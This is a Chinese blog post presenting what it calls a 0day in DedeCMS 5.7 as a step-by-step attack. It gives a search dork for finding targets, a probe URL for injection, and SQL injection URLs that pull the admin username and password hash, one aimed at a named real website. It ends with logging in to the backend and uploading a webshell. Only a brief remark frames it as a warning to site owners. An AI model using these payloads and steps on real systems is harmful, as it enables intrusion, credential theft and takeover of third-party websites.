织梦cms最新漏洞_织梦cms5.7版本通杀0day漏洞

织梦cms最新漏洞_织梦cms5.7版本通杀0day漏洞

织梦cms是我们站长最喜欢的开源程序,可以说是它成就了我们成为站长的一个梦,自从织梦cms被收购,创始人离开,织梦好像就一直没有大动作,几乎个几年更新一次,而且更新的都是补漏洞的一些细节,其他的几乎没有变化,就这样新哥博客个人感觉织梦现在基本是废了。

织梦cms最新漏洞_织梦cms5.7版本通杀0day漏洞

目前站长们对织梦最头痛的就是网站老是被黑,其实这个一直就存在,只不过随着用户群体增大,被黑的几率就越来越大,这也是没有办法。

好了, 题外话可能说多了,今天来说说,最新织梦cms5.7版本通杀0day漏洞,希望大家要小心,维护好自己的网站:

织网5.7的漏洞,可任意上传~

搜索关键词:Powered by DedeCMSV57_GBK 2004-2011 DesDev Inc

访问/data/admin/ver.txt来查看cms

然后访问/member/ajax_membergroup.php?action=post&membergroup=1,出现”朋友 修改”即可注入

通过注入得到管理员帐号密码,搜后台,上传大马OK~提权还在学习阶段~

织梦cms最新漏洞_织梦cms5.7版本通杀0day漏洞

 

 

 

 

查看网站的版本

code 区域cms /data/admin/ver.txt

织梦cms最新漏洞_织梦cms5.7版本通杀0day漏洞

 

 

 

查看是否有”朋友 修改”,有则存在注入

code 区域/member/ajax_membergroup.php?action=post&membergroup=1

织梦cms最新漏洞_织梦cms5.7版本通杀0day漏洞

 

 

 

 

帐号

code 区域https://www.dzdyk.com /member/ajax_membergroup.php?action=post&membergroup=@`’` Union select userid from `%23@__admin` where 1 or id=@`’`

织梦cms最新漏洞_织梦cms5.7版本通杀0day漏洞

 

 

 

去掉前三位和最后一位,得到管理员密码

code 区域/member/ajax_membergroup.php?action=post&membergroup=@`’` Union select pwd from `%23@__admin` where 1 or id=@`’`

织梦cms最新漏洞_织梦cms5.7版本通杀0day漏洞

 

 

 

 

扫后台,登录成功

织梦cms最新漏洞_织梦cms5.7版本通杀0day漏洞

 

 

 

 

 

后台页面

织梦cms最新漏洞_织梦cms5.7版本通杀0day漏洞

 

 

 

 

 

模块-文件管理器-文件上传 上传大马

织梦cms最新漏洞_织梦cms5.7版本通杀0day漏洞

 

 

 

 

登录webshell

以上就是最新发现的织梦cms漏洞,各位要注意了,要勤备份网站,每天及时发现网站有没有新的文件进来。对于织梦cms程序老是被黑,除了传统的更改文件名,移动文件目录,其他的也没有什么好的办法,只能用土办法了。

本文来源:新哥博客 https://www.xingeblog.com/
本文标题:织梦cms最新漏洞_织梦cms5.7版本通杀0day漏洞
本文链接:https://www.xingeblog.com/111.html
1. 本站所有资源来源于用户上传或网络,仅作为参考研究使用,如有侵权请邮件联系站长!
2. 本站VIP获取途径以及用途的解读,想在本站混的好,请务必认真阅读!
3. 本站强烈打击盗版/破解等有损他人权益和违法作为,请各位会员支持正版!谢谢!^^
0

评论0

  • 昵称
  • 邮箱
  • 网址
没有账号? 注册忘记密码?
'); })();